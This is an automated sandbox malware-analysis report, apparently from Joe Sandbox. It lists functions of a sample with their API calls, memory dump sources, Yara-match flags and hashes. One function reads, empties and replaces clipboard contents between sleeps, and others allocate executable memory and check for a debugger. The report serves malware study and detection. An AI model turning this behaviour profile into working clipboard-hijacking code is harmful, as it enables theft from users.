Instruction ID: 373609c7fd307ef06685ff80add0f5f843e46d53b934b4a801672e3e55fe8bac
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: C6D01231545228B7D7412A94DC09BCD7B5CDF05B66F008011FB0DD9481C770954046E5

Function 00434176 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94

Function 00403695 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00403772

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA

Function 00402819 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54

Function 00403CB8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CBF

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94

Function 00432775 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327B3

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9

Function 0043CFBB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043CFFC

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4

Function 00433697 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED

Function 0040FB02 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103B7

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D

Function 0043CCFA Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 00560465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 005604B6

Memory Dump Source

Source File: 00000000.00000002.3754052818.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_560000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d228a9cddfd9111f9a44b2e45a9b5e1d1710010e70b07292a1dc2672d5dd14c0
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 20112B79A40208EFDB01DF98C985E99BFF5AF48351F058094FA489B362D771EA50DF80

Non-executed Functions

Function 020F1942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 152clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 020F194D
Sleep.KERNEL32(00001541,0000004C), ref: 020F1957

Part of subcall function 020FCE6D: _strlen.LIBCMT ref: 020FCE84

OpenClipboard.USER32(00000000), ref: 020F1984
GetClipboardData.USER32(00000001), ref: 020F1994
_strlen.LIBCMT ref: 020F19B0
_strlen.LIBCMT ref: 020F19DF
_strlen.LIBCMT ref: 020F1B23
EmptyClipboard.USER32 ref: 020F1B39
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 020F1B46
GlobalUnlock.KERNEL32(00000000), ref: 020F1B70
SetClipboardData.USER32(00000001,00000000), ref: 020F1B79
GlobalFree.KERNEL32(00000000), ref: 020F1B80
CloseClipboard.USER32 ref: 020F1BA4
Sleep.KERNEL32(000002D2), ref: 020F1BAF

Strings

4#E, xrefs: 020F195D
i, xrefs: 020F19C0

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
Instruction ID: 0f2f077b06b278660e3ff5c4a6dfe024806954a600cbf3bb1818612ac8827532
Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
Instruction Fuzzy Hash: 6851E230C40784DAE351DBA8EC457FDB774FF2A306F045225DA05A6162FB709A85CB69

Function 020F2357 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 020F2392
GetClientRect.USER32(?,?), ref: 020F23A7
GetDC.USER32(?), ref: 020F23AE
CreateSolidBrush.GDI32(00646464), ref: 020F23C1
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 020F23E0
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 020F2401
GetDeviceCaps.GDI32(00000000,0000005A), ref: 020F240C
MulDiv.KERNEL32(00000008,00000000), ref: 020F2415
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 020F2439
SetBkMode.GDI32(?,00000001), ref: 020F24C4
_wcslen.LIBCMT ref: 020F24DC

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
Instruction ID: 817816eac6b4b7f8500841446f3847518074ae4982e127f02a79e5747185ea21
Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
Instruction Fuzzy Hash: 8C71ED72900228AFDB629F64DD85FAEBBBCEF09751F0041A5F609E6155DA70AF80CF10

Function 0043D668 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7AE

Strings

1#INF, xrefs: 0043E9BB
1#IND, xrefs: 0043E9A6
1#QNAN, xrefs: 0043E9B4
1#SNAN, xrefs: 0043E9AD

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
Instruction ID: eb952a9da5ee3ca1a054b410db7a12ab4ba9b877121e99a49e25e720736a14a4
Opcode Fuzzy Hash: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
Instruction Fuzzy Hash: 1EC25B71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45

Function 0043B75E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835

Strings

OCP, xrefs: 0043B7B2
ACP, xrefs: 0043B77C

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8

Function 0212B9C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0212BCE4,?,00000000), ref: 0212BA5E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0212BCE4,?,00000000), ref: 0212BA87
GetACP.KERNEL32(?,?,0212BCE4,?,00000000), ref: 0212BA9C

Strings

OCP, xrefs: 0212BA19
ACP, xrefs: 0212B9E3

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 17173e37005eb4d29948887d4ff1a06b4e79a7dac50ae4049a33298ea1988f05
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 9521B032688125AADB388F59D901BA773A6FB40F6CB578464F94AD7110FB32DF68C350

Function 0043B932 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9

Function 0212BB99 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

Part of subcall function 02122131: _free.LIBCMT ref: 02122190
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0212219D

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0212BCA5
IsValidCodePage.KERNEL32(00000000), ref: 0212BD00
IsValidLocale.KERNEL32(?,00000001), ref: 0212BD0F
GetLocaleInfoW.KERNEL32(?,00001001,02120A0C,00000040,?,02120B2C,00000055,00000000,?,?,00000055,00000000), ref: 0212BD57
GetLocaleInfoW.KERNEL32(?,00001002,02120A8C,00000040), ref: 0212BD76

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: fb779646fd192f59eddfb74c4e6bb2da857580eee8f6f16c5fd88018523592d3
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: DB518071944229AFDB14DFA5CC44BBE73B9EF04708F045429F910E7250EB719B69CBA1

Function 0043AFFA Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
_wcschr.LIBVCRUNTIME ref: 0043B16C
_wcschr.LIBVCRUNTIME ref: 0043B17A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9

Function 0212B261 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02120A13,?,?,?,?,0212046A,?,00000004), ref: 0212B343
_wcschr.LIBVCRUNTIME ref: 0212B3D3
_wcschr.LIBVCRUNTIME ref: 0212B3E1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02120A13,00000000,02120B33), ref: 0212B484

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: c7cb27a5d419cc2ae377cf17f0ded54ea95e4163e8713378c91a014dd4243152
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: BA61EB71A84325AED715AF74CC81BBB73A9EF05718F14443AF915D7180E774D628CBA0

Function 0043B3E5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
Opcode Fuzzy Hash: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99

Function 0042A3C3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49

Function 0211A62A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,020FDACD), ref: 0211A722
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,020FDACD), ref: 0211A72C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,020FDACD), ref: 0211A739

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 267b83d3880bfa463f67502eddcf00a4169ee830bc4b20a239ee32d729f43d28
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: 9031C47494131C9BCB21DF64D98879CBBB8BF08711F5041EAE40CA7290E7719B85CF45

Function 0042FE4F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
ExitProcess.KERNEL32 ref: 0042FE89

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48

Function 021200B6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0212008C,00000000,00457970,0000000C,021201E3,00000000,00000002,00000000), ref: 021200D7
TerminateProcess.KERNEL32(00000000,?,0212008C,00000000,00457970,0000000C,021201E3,00000000,00000002,00000000), ref: 021200DE
ExitProcess.KERNEL32 ref: 021200F0

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
